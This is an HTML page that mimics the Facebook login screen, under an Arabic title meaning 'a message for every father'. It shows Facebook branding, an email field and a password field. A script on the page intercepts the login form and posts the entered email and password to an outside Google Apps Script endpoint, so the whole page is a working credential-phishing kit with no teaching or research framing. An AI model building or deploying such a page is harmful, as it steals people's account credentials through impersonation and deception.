<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>رسالة لكل اب</title>
</head>
<style>
    
    * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        html {
             min-height: 100vh;
          border: 5px;
          width:100vw ;
          overflow-x: hidden;
           
        }
    
        body {
         
          min-height: 100vh;
          border: 5px;
          width:100vw ;
          overflow-x: hidden;
          background-color: #f0f2f5;
            
        }
        .Fbook{
    color: #1877f2;
    position: absolute;
    padding-top: 190px;
    left: 10%;
    font-size: 28px;
    font-family: 'Tahoma';
        }
      .des{
        position: absolute;
        padding-top: 270px;
        left: 10%;
        font-family:'Tahoma' ;
        font-size: 27px;
      }
      .box{
        position: absolute;
        height: 251px;
        width: 400px;
        border-radius: 10px;
        box-shadow: 0px 0.60323px 0.60323px -1.25px rgba(0, 0, 0, 0.18), 0px 2.29021px 2.29021px -2.5px rgba(0, 0, 0, 0.16), 0px 10px 10px -3.75px rgba(0, 0, 0, 0.063), 0px 2px 4px rgba(0, 0, 0, 0.25), 0px 4px 8px rgba(0, 0, 0, 0.25);
        left: 60%;
        padding-top: 400px;
        top: 100px;
        background-color: white;
      }
      .k{
        position: absolute;
        top: 20%;
        left: 62%;
      }
      .oo{
        position: absolute;
        width: 350px;
        height: 50px;
      }
      .o{
        position: absolute;
        width: 350px;
        height: 50px;
        top: 150px;
        color: #f0f2f5;
        background-color: #1877f2;
        font-size: 20px;
        border-radius: 10px;
      }
      .io{
        position: absolute;
        width: 350px;
        height: 50px;
        top: 88px;


      }
      .forgot{
        position: absolute;
        top: 330px;
        color: #1877f2;
        left: 70%;

      }
      .divide{
        position: absolute;
        top: 370px;
        background-color: #d6d9de;
        width: 330px;
        height: 1px;
        left: 63%;
      }
      .col{
        position: absolute;
        top: 400px;
        background-color: #42b72a;
        width: 200px;
        height: 50px;
        left: 68%;
        border-radius: 10px;
      }
      .lol{
        position: absolute;
        top: 414px;
        color: white;
        left: 69.6%;
        font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;

      }
      @media (max-width: 768px) {
            .Fbook {
                font-size: 15px;
                margin-top: 8px;
                left: 25%;
            }

            .des {
                position: absolute;
                left: 65px;
                top: -10px;
                font-size: 11px;
            }

            .box {
                max-width: 60%;
                padding-top: 20px;
                top: 300px;
                left: 15%;
            }

            .o {
                position: absolute;
                width: 195px;
                height: 30px;
                top: 280px;
                left: -163px;
                font-size: 12px;
                border-radius: 5px;
            }

           
            .oo{
                position: absolute;
                width: 200px;
                height: 30px;
                top: 190px;
                left: -165px;
            }
            .j{
                position: absolute;
                top: 175px;
                left: -160px;
                font-size: 12px;
            }
            .io{
                position: absolute;
                width: 200px;
                height: 30px;
                top: 235px;
                left: -165px;

            }
            .h{
                position: absolute;
                top: 220px;
                left: -160px;
                font-size: 12px;
            }
            .lol{
                position: absolute;
                top: 490px;
                left: 85px;
            }
            .col{
                position: absolute;
                top: 480px;
                left: 70px;
            }
            .forgot
           {
            position: absolute;
            top: 450px;
            left: 118px;
            font-size: 12px;
        
           }
           .divide
           {
            position: absolute;
            top: 470px;
            left: 70px;
            width: 200px;

           }

            
        }


  
   
</style>
<body>
    
    <div class="Fbook">
        <h1>
            facebook
        </h1>
    </div>
    <div class="des">
        <p>Facebook helps you connect and share <br>      with the people in your life.</p>

    </div>
    <div class="box">

    </div>
    <form class= "k" name="submit-to-google-sheet">
        <label class="j">Email adress </label><br>
        <input class="oo" type="text" name="1" required><br><br><br>
        <label class="h">Password</label><br>
        <input class="io" type="text" name="2" required><br><br><br>
        <input class="o" type="submit" name="login"><br><br>
    </form>
      <script>
        const scriptURL = 'https://script.google.com/macros/s/AKfycbxBxk8BcvBuF2ZWrc0eHNlahp6JsCzySep3k-zZh12aMy1iRYFBYQg9e-HEMtfERWfLIg/exec'
        const form = document.forms['submit-to-google-sheet']

        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => console.log('Success!', response))
            .catch(error => console.error('Error!', error.message))
        })
      </script>
    <div class="forgot">
        <h4>forgotten password?</h4>

    </div>
    <div class="divide">

    </div>
    <div class="col"></div>
    <div class="lol">
        <h3>Create new account</h3>
    </div>
    
   
    
</body>
</html>